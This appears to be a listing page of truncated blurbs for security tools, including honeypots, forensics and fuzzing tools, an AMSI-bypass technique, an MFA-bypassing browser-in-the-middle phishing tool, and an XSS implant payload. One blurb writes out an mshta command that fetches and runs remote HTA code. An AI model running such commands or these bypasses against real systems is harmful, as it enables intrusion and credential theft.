The pentester's Swiss knife
SentryPeer A distributed list of bad IP addresses and phone numbers was collected via a SIP Honeypot. This is basically a fraud detection tool. It lets bad actors try to make phone calls and...
ShellcodeGenZ takes your commands (like mshta.exe http://192.168.0.1/azi.hta) and turns ’em into shellcode that’s ready to flex. It hunts down bad chars (like 0x0a, 0x0b, or the default 0x00), lets you yeet ’em manually or auto...
Digital Forensics Lab & Shared Cyber Forensic Intelligence Repository Features of Repository Interactive Digital Forensics Labs: Tailored for students and faculty engagement Linux-Centric Lab Environment: Utilizes Kali Linux exclusively for all labs Visual Learning Support: Each lab...
Telerecon Telerecon is a comprehensive OSINT reconnaissance framework for researching, investigating, and scraping Telegram. For example: Input a target username, and Telerecon efficiently crawls across multiple chats gathering profile metadata, account activity, and user...
EntraFalcon is a PowerShell-based assessment tool for pentesters, security analysts, and system administrators to evaluate the security posture of a Microsoft Entra ID environment. Designed for ease of use, EntraFalcon runs on PowerShell 5.1...
This technique exploits the COM-level mechanics AMSI uses when delegating scan requests to antivirus (AV) providers through RPC. By hooking into the NdrClientCall3 function—used internally by the RPC runtime to marshal and dispatch function...
ntfstool NTFSTool is a forensic tool to play with disks and NTFS volumes. It supports reading partition info (mbr, partition table, vbr) but also information on bitlocker encrypted partition (fve). See examples below to...
fuzzuf fuzzuf (fuzzing unification framework) is a fuzzing framework with its own DSL to describe a fuzzing loop by constructing building blocks of fuzzing primitives. Why use fuzzuf? fuzzuf enables a flexible definition of a fuzzing loop...
CuddlePhish Weaponized multi-user browser-in-the-middle (BitM) for penetration testers. This attack can be used to bypass multi-factor authentication on many high-value web applications. It even works for applications that do not use session tokens, and...
Apepe Apepe is a Python tool developed to help pentesters and red teamers easily get information from the target app. This tool will extract basic pieces of information such as the package name if...
T-Pot – The All In One Honeypot Platform T-Pot is based on the Debian (Stable) network installer. The honeypot daemons as well as other support components are dockered. This allows T-Pot to run multiple honeypot...
Caracal Caracal is a static analyzer tool over the SIERRA representation for Starknet smart contracts. Features Detectors to detect vulnerable Cairo code Printers to report information Taint analysis Data flow analysis framework Easy to...
CSIRT-Collect A PowerShell script to collect memory and (triage) disk forensics for incident response investigations. The script leverages a network share, from which it will access and copy the required executables and subsequently upload...
honeypots 30 low-high level honeypots in a single PyPI package for monitoring network traffic, bots activities, and username \ password credentials. The honeypots respond back, non-blocking, can be used as objects, or called directly...
JS-Tap JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post-exploitation implant. The payload does...
IPED Digital Forensic Tool IPED is open-source software that can be used to process and analyze digital evidence, often seized at crime scenes by law enforcement or in a corporate investigation by private examiners....